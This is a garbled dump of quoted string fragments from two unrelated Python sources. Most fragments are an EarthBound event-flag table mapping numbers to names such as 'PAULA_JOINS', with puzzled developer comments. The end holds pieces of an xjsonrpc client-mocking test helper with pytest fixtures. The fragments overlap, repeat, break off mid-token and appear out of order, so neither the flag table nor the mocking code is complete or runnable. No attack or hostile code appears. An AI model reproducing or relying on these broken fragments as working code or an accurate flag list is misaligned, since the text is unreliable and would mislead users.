449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH',
# 376 (Unknown. Set after Apple Kid calls you about the Gourmet Yogurt Machine)
# 780 (If set, Maxwell doesn't actually save your game. WHAT?)
541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS',
# 378 (???)
573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP',", "660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666:", "401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407:", "780 (If set, Maxwell doesn't actually save your game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829:", "'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE',", "594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598:", "Ness's house door knocking?) 468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM', 472:", "# 144 (Related to Bulldozer at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', #", "245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251:", "'TALKED_TO_BRICK_ROAD', # 54 (Montague at beginning of expanded mine?) # 55 (Also related", "760: 'PHASE_DISTORTER_MUSIC', # 761 (Unknown. Set when arriving in Threed, cleared when defeating", "598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604:", "hate multipurpose flags) # 231 (I hate multipurpose flags) # 232 (I hate", "471: 'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE', # 475 (Handles continue yes/no", "305 (???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311:", "(Another flag for Starman DX defeated. One of them might be responsible only", "488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494:", "Guardian doesn't reference this flag and never fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The", "(Unknown. Related to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376 (Unknown. Set", "'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN', # 607", "# 163 (???) # 164 (???) 165: 'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168:", "Tess color palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED',", "'FRANKYSTEIN_MKII_DEFEATED', # 65 (???) 
524: 'YOUR_SANCTUARY_MUSIC', # 525 (???)", "'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER',", "211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217:", "(0x02A0, 0x0D70) in a radius of 16 pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348:", "479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485:", "'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED',", "'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE',", "38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44:", "447 (???) # 448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH',", "when arriving in Threed, cleared when defeating Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764:", "'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370", "607 (Unknown. Related to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', #", "for NPCs #851 and #852 760: 'PHASE_DISTORTER_MUSIC', # 761 (Unknown. Set when arriving", "91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97:", "flag for someone in Threed?) # 589 (Visibility flag for some Hotel Attendant?)", "(Unknown. Set when you receive the Pencil Eraser. 
# 175 (Unknown. Set when you receive the Pencil Eraser. Cleared when you defeat Mr. Carpainter)
# 747 (??? Something about Runaway Five)
111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN',", "634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 640:", "'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING',", "'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE',", "# 55 (Also related to Montague... AND STONEHENGE??) # 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT',", "'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to traffic jam?) # 371 (???) 372: 'PARTY_IS_ROBOTIFIED',", "# 475 (Handles continue yes/no on death. TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED',", "66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72:", "724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL', 730:", "449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455:", "213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219:", "'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1',", "8: 'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14:", "'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY',", "'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn. Related to Stonehenge Base) 620:", "'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198", "'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', # 156 (???) # 157 (???) # 158", "'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP',", "to Paula's dad and not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614:", "568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 
# 607 (Unknown. Related to desert mine?)
772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457 and #459", "12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18:", "93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99:", "114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120:", "'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP',", "(I hate multipurpose flags) # 228 (I hate multipurpose flags) # 229 (I", "'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs #851 and #852 760: 'PHASE_DISTORTER_MUSIC',", "(Unkonwn. Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED',", "'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) # 523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525", "#457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get calls from Dad?) 776:", "Building) -- Got kicked out of Pokey's Room in the Monotoli Building? 626:", "405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411:", "364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', #", "book\"? This flag is set even if you don't talk to Apple Kid", "310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', # 313 (Unknown. Something about the City", "'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN',", "'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM',", "# First hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', #", "talk to Tracy after defeating Giygas, but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771", "'SHOP_SOLD_ITEM', # 226 (I hate multipurpose flags) # 227 (I hate multipurpose flags)", "648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654:", "152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', # 156 (???) # 157", "# TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599:", "of expanded mine?) # 55 (Also related to Montague... AND STONEHENGE??) 
# 56", "718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724:", "'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER',", "'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT', 276: 'MASTER_BARF_DEFEATED', 277: 'GUARDIAN_MOLE_1_DEFEATED', 278: 'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED',", "'POO_STARTS_HIS_JOURNEY', # 150 (Related to Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN',", "696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702:", "703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709:", "499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE', 505:", "'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673:", "# 377 (???) # 378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???) # 381", "City Bus?) # 314 (Unknown. Something about the Runaway Five Bus?) 315: 'GHOSTS_BLOCKING_TWOSON',", "487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493:", "'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED',", "'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC',", "59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', #", "108: 'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE', # 110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS',", "19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25:" ]
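# A minimal usage sketch (illustrative, not from the source): assuming the numbered
# entries above belong to a dict bound to a hypothetical name such as EVENT_FLAGS,
# a reverse map from flag name to flag number could be derived like this:
#
#     FLAG_IDS = {name: flag for flag, name in EVENT_FLAGS.items()}
#     assert FLAG_IDS['ONETT_COP_DIALOGUE'] == 109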
[ "self._calls.clear() def start(self): \"\"\" Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target) with patcher:", "**kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if match.callback:", "def _on_request(self, origin_self: Any, request_text: str, is_notification: bool = False, **kwargs: Any): endpoint", "-> None: \"\"\" Stop an active patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint:", "str = '2.0'): \"\"\" Removes a previously added response patch. :param endpoint: request", "patched request version :param once: if ``True`` the patch will be deleted after", "shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\"", "Response: matches = self._matches[endpoint].get((version, method_name)) if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match", "(list, tuple)): result = match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else:", "def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. \"\"\" with PjRpcAiohttpMocker() as mocker: yield", "return result def reset(self) -> None: \"\"\" Removes all added matches and reset", "patch will be deleted after the first call :param callback: patched request callback", "result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str, method_name: str, result:", "str]] = None, version: str = '2.0', once: bool = False, callback: Optional[Callable]", "version, method_name) return result def reset(self) -> None: \"\"\" Removes all added matches", "an active patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str =", "self._patcher = None self._async_resp = False self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda:", "id: Optional[Union[int, str]], ) -> Response: matches = self._matches[endpoint].get((version, method_name)) if matches is", "UNSET, UnsetType class Match: \"\"\" Match object. Incorporates request matching information. \"\"\" def", "= mocker self._patcher = None self._async_resp = False self._passthrough = passthrough self._matches: Dict", "client mocking fixture. \"\"\" with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker():", "match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or", ") -> None: \"\"\" Appends response patch. If the same method patch already", "deleted after the first call :param callback: patched request callback \"\"\" match =", "error=match.response_data['error'], ) def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop()", "JSON-PRC method calls. 
\"\"\" return self._calls def add( self, endpoint: str, method_name: str,", "self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return", "json import unittest.mock from typing import Any, Callable, Dict, Optional, Union import pytest", "= match def remove(self, endpoint: str, method_name: Optional[str] = None, version: str =", "pass not mocked requests to the original method \"\"\" def __init__(self, target, mocker=unittest.mock,", "once: if ``True`` the patch will be deleted after the first call :param", "(list, tuple)): response = xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method,", "than one) \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback)", "in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data)", "previously added response patch. :param endpoint: request endpoint :param method_name: method name :param", "= callback self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param", "def wrapper(): return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def _match_request( self, endpoint:", "is None: result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name)", "Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def calls(self) -> Dict:", "mocking out ``xjsonrpc`` library clients. \"\"\" import asyncio import collections import functools as", "autospec=True) return self._patcher.start() def stop(self) -> None: \"\"\" Stop an active patcher. \"\"\"", "request.params, request.id) if self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return wrapper() else: return", "Response from xjsonrpc.common import UNSET, UnsetType class Match: \"\"\" Match object. Incorporates request", "PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') 